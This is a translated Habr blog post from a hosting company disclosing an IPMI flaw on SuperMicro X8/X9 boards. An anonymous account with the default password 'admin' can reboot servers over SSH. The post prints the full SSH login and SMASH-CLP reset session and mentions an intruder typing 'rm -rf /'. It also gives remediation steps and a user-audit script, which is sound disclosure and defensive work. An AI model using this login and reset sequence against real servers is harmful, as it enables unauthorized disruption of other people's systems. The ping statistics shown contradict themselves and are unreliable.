
IPMI vulnerability in shell v. 1.00 that allows rebooting the server

Greetings, dear Habr readers!

From now on, the GlobaTel team will try to please you with informative articles in the field of hosting and data centers, and will sometimes publish our achievements from a purely technical point of view.


Today I would like to start with a simple but very important article about how we came across a glaring hole in IPMI.



One of our clients complained that a new server with a Xeon E3 from a well-known Russian brand reboots very often. Going to the server's IPMI, we saw the command rm -rf / actively being typed. Anyone who has seen this will understand. We pulled out the power cord and went with a netbook to set up the server and figure out what was going on.

I must say that we solved this problem by blocking all IPMI IPs. Access is now granted only to client IPs by prior arrangement.

The problem is closed in the shell version 1.00.

Here is one of the tricks (a server reboot) that can be pulled off. Not everyone knows that it is possible to connect to IPMI over SSH. This feature allows you to restart the server. It turns out that the web interface does not let you change the password of the anonymous user, which has the standard password admin and which for some reason can reboot the machine via SSH.

Here is a listing of commands when connecting to IPMI via SSH:

Password of anonymous: admin
# ssh -o PreferredAuthentications=password,keyboard-interactive -l "" IPMI
@IPMI's password:
Auth User/Pass with PS...pass.

ATEN SMASH-CLP System Management Shell, version 1.00
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved

-> show
/

Targets :
system1

Properties :
None

Verbs :
cd
show
help
version
exit

-> cd system1
/system1

-> show /system1/pwrmgtsvc1
/system1/pwrmgtsvc1

Targets :
none

Properties :
Name=IPMI Power Service
CreationClassName=IPMI_PowerManagementService
ElementName=Server Power Management Service
EnabledState=5
RequestedState=12
EnabledDefault=2
PowerState=1

Verbs :
cd
show
help
version
exit
start
stop
reset

-> reset /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
reset done...


Ping server:

ping IpOfServer

Pinging IpOfServer with 32 bytes of data:
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.

Ping statistics for IpOfServer:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),



As you can see, there is no ping: the server is restarting.

Addendum: the problem relates to IPMI version 2.0 (not BIOS) 1.00 for SuperMicro X8 and X9 series motherboards and dual-processor boards for Xeon 56xx series processors.


The anonymous user needs to be disabled through ipmitool.

Listing for installation on Linux:

wget ftp.supermicro.com/utility/IPMICFG/Linux/IPMICFG-Linux_v1.41.zip
unzip IPMICFG-Linux_v1.41.zip
cd IPMICFG-Linux_v1.41_110706/
chmod 755 *


The command to disable the anonymous user:

ipmitool user disable 1
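
To find BMCs that still need this treatment, the following added example (not from the original article) parses a user table in the layout printed by `ipmitool user list` and flags accounts with an empty name that still hold a channel privilege. The sample table is constructed and the helper name audit_null_users is hypothetical.

```shell
#!/bin/sh
# Constructed sample, laid out like the table `ipmitool user list` prints
# (ID, Name, Callin, Link Auth, IPMI Msg, Channel Priv Limit).
# Not captured from a real BMC; column widths are an assumption.
sample_user_list() {
cat <<'EOF'
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       ADMINISTRATOR
2   ADMIN            true    true       true       ADMINISTRATOR
3   monitor          true    false      true       USER
4                    true    false      false      NO ACCESS
EOF
}

# audit_null_users (hypothetical helper): read a user table on stdin and
# print one line per account whose name is empty but which still holds a
# channel privilege, like the anonymous user with ID 1 in the article.
audit_null_users() {
  awk '
    $1 !~ /^[0-9]+$/ { next }      # skip the header and anything without an ID
    {
      # The name column may be empty, so field positions shift. Anchor on
      # the three true/false flag columns, searching from the right so a
      # user literally named "true" is not mistaken for a flag.
      f = 0
      for (i = NF - 2; i >= 2; i--)
        if ($i ~ /^(true|false)$/ && $(i+1) ~ /^(true|false)$/ &&
            $(i+2) ~ /^(true|false)$/) { f = i; break }
      if (!f) next
      name = ""; priv = ""
      for (i = 2; i < f; i++)       name = name (i > 2 ? " " : "") $i
      for (i = f + 3; i <= NF; i++) priv = priv (i > f + 3 ? " " : "") $i
      if (name == "" && priv != "" && priv != "NO ACCESS")
        printf "user %s: empty name, privilege %s\n", $1, priv
    }'
}

sample_user_list | audit_null_users
# → user 1: empty name, privilege ADMINISTRATOR
```

On a managed host the function can be fed live data with `ipmitool user list 1 | audit_null_users`; the channel number 1 is an assumption and differs between boards.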

Source: https://habr.com/ru/post/144811/

